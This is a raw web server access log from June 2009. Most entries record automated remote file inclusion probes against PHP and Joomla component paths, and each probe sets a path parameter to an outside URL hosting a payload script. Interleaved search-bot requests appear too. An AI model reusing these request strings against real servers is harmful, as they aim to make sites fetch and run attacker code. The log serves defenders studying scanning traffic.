190.144.44.36 - - [03/Jun/2009:22:39:57 -0500] "GET /home.php?index=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:22:39:57 -0500] "GET /logs/home.php?index=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
89.188.129.126 - - [03/Jun/2009:22:40:36 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:40:36 -0500] "GET /phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:40:36 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:44:51 -0500] "GET /logs/access_log.1239580800//modules/xfsection/modify.php?dir_module=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:22:44:51 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:22:44:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
62.140.23.192 - - [03/Jun/2009:22:45:37 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:45:37 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:45:42 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:45:42 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
119.63.193.56 - - [03/Jun/2009:22:48:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
61.160.201.12 - - [03/Jun/2009:22:49:37 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.160.201.12 - - [03/Jun/2009:22:49:37 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.160.201.12 - - [03/Jun/2009:22:49:38 -0500] "GET /logs/access_log.1239926400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.160.201.12 - - [03/Jun/2009:22:49:41 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:51:30 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:51:30 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:51:30 -0500] "GET /logs/access_log.1241049600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:51:30 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.208.130 - - [03/Jun/2009:22:51:36 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:36 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:37 -0500] "GET /logs/access_log.1147046400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:37 -0500] "GET /logs/access_log.1139097600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:38 -0500] "GET /logs/access_log.1220227200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:39 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:40 -0500] "GET /logs/access_log.1153699200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [03/Jun/2009:22:51:40 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.140.23.192 - - [03/Jun/2009:22:54:14 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:54:14 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:54:25 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.140.23.192 - - [03/Jun/2009:22:54:25 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://208.98.22.241/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
61.160.201.12 - - [03/Jun/2009:22:56:20 -0500] "GET /logs/access_log.1242000000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.165 - - [03/Jun/2009:22:56:38 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.144.44.36 - - [03/Jun/2009:23:02:13 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:23:02:13 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
74.52.2.130 - - [03/Jun/2009:23:02:25 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:25 -0500] "GET /?sourcedir=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:26 -0500] "GET /logs/?sourcedir=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 200 191984 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:30 -0500] "GET /logs/access_log.1239926400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:30 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:30 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:30 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:02:42 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:03:13 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
85.17.162.28 - - [03/Jun/2009:23:05:02 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
85.17.162.28 - - [03/Jun/2009:23:05:02 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://designmono.com/zboard_bbs/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
122.153.212.195 - - [03/Jun/2009:23:05:26 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:23:05:31 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:23:05:36 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.15.14.89 - - [03/Jun/2009:23:05:40 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.15.14.89 - - [03/Jun/2009:23:05:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.15.14.89 - - [03/Jun/2009:23:05:40 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideofderby.co.uk/language/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
122.153.212.195 - - [03/Jun/2009:23:05:52 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:23:07:10 -0500] "GET /logs/access_log.1241568000//estilo/[ANYhttp://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:07:10 -0500] "GET /logs//estilo/[ANYhttp://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
74.52.2.130 - - [03/Jun/2009:23:07:10 -0500] "GET //estilo/[ANYhttp://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
65.55.106.168 - - [03/Jun/2009:23:08:41 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [03/Jun/2009:23:10:48 -0500] "GET /logs/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.17.99.13 - - [03/Jun/2009:23:10:48 -0500] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.17.99.13 - - [03/Jun/2009:23:10:48 -0500] "GET /logs/access_log.1239408000/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
216.17.99.13 - - [03/Jun/2009:23:11:02 -0500] "GET /logs/access_log.1240531200/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:12:53 -0500] "GET /logs/access_log.1237766400/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:12:53 -0500] "GET /logs/access_log.1232323200/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:12:54 -0500] "GET /logs/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:12:54 -0500] "GET /appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:13:15 -0500] "GET /appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:13:15 -0500] "GET /logs/access_log.1232323200/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:13:18 -0500] "GET /logs/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.189.18.73 - - [03/Jun/2009:23:13:18 -0500] "GET /logs/access_log.1237766400/appserv/main.php?appserv_root=http://harvestusa.org///administrator//includes/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.165.73.157 - - [03/Jun/2009:23:16:51 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [03/Jun/2009:23:16:51 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.165.73.157 - - [03/Jun/2009:23:16:52 -0500] "GET /logs/access_log.1231718400//bbs//skin/zero_vote/ask_password.php?dir=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.165.73.157 - - [03/Jun/2009:23:16:57 -0500] "GET /logs/access_log.1236643200//bbs//skin/zero_vote/ask_password.php?dir=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:07 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:07 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:07 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:11 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:11 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:11 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:30 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:19:34 -0500] "GET /logs/access_log.1239926400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:23:20:12 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:23:20:12 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:23:20:12 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:23:20:12 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:23:22:06 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:23:22:06 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
216.17.99.13 - - [03/Jun/2009:23:22:32 -0500] "GET /logs/access_log.1240444800/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.131 - - [03/Jun/2009:23:22:41 -0500] "GET /logs/access_log.1198627200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.213.145 - - [03/Jun/2009:23:25:06 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:06 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:07 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:41 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:54 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:57 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:25:59 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.213.145 - - [03/Jun/2009:23:26:35 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:05 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:06 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:14 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:14 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:14 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:22 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:23:27:31 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:23:27:32 -0500] "GET /errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:23:27:32 -0500] "GET /logs/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:23:27:32 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.11 - - [03/Jun/2009:23:28:28 -0500] "GET ///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.11 - - [03/Jun/2009:23:28:28 -0500] "GET /logs///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.11 - - [03/Jun/2009:23:28:28 -0500] "GET /logs/access_log.1237420800///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.11 - - [03/Jun/2009:23:28:28 -0500] "GET /logs/access_log.1236211200///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.79.47.122 - - [03/Jun/2009:23:28:28 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.11 - - [03/Jun/2009:23:29:02 -0500] "GET /logs/access_log.1236297600///index.php?DOCUMENT_ROOT=http://www.xthosting.be/adserver/w/copyright.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.142.148.142 - - [03/Jun/2009:23:29:23 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.142.148.142 - - [03/Jun/2009:23:29:23 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.142.148.142 - - [03/Jun/2009:23:29:23 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.142.148.142 - - [03/Jun/2009:23:29:23 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
76.164.212.18 - - [03/Jun/2009:23:31:31 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
76.164.212.18 - - [03/Jun/2009:23:31:32 -0500] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
76.164.212.18 - - [03/Jun/2009:23:31:38 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [03/Jun/2009:23:31:47 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
